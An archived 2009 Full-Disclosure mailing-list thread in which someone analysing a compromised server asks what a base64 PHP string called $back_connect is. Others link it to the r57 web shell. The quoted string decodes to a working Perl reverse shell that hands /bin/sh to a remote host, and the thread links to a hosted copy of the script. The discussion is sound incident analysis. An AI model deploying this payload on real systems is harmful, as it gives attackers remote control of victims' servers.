| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 10 Feb 2009 14:34:37 -0500 From: "sr." <staticrez@...il.com> To: Gustavo Castro <gcastrop@...il.com> Cc: Full-Disclosure <full-disclosure@...ts.grok.org.uk>, pen-test list <pen-test@...urityfocus.com> Subject: Re: connect back PHP hack i really appreciate all of the responses. this is what community is all about. i'd seen the "==" in other encoding schemes, but just wasn't sure and wanted a quick response...thanks to everyone who responded! I'll post the rest of my findings on here asap. i'm looking into an old compromised machine. this is nothing new.. whoever mentioned the r57 shell, you're probably right as the script connects to a remote box @ port 11457. this is r57 behaviour. i also found a copy of the same script i'm dissecting on someone else's box, you can check it out here: http://www.menola.org/~matjaz/images/info/o_meni/config.inc.php in my case, a bunch of php files were modified. i'll zip everything up and host it so you can all analyze... thx, sr. aka "fabrizio siciliano" On Tue, Feb 10, 2009 at 2:10 PM, Gustavo Castro <gcastrop@...il.com> wrote: > "Sr." > > This is base64 encoded. > > 2009/2/10 sr. <staticrez@...il.com>: >> can anyone tell me what encoding this is? >> >> $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj >> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR >> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT >> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI >> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi >> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl >> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; >> >> this has to do with old php 4.x.x version with magic quotes enabled. >> i'm just trying to figure out what the connect back code does. >> >> any input is much appreciated. >> >> thx, >> >> sr. > > -- > Saludos, > Gustavo Castro Puig. > E-Mail: gcastrop@...il.com > > LPI Level-1 Certified (https://www.lpi.org/es/verify.html > LPID:LPI000042304 Verification Code: hp6re8w5qg ) > -----BEGIN GEEK CODE BLOCK----- > Version: 3.12 > GCS/CM/IT/ED dx s-:- a? C(+++)$ UL++++*$ P+ L++++(++)$ E--- W+++$ N+ o? > K- w O M V-- PS PE++(-) Y-(+) PGP+ t(++) 5+ X++ R tv+ b++(++++) DI+++ > D++ G++ e++ h--- r y+++ > ------END GEEK CODE BLOCK------ > Registered Linux User #69342 > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists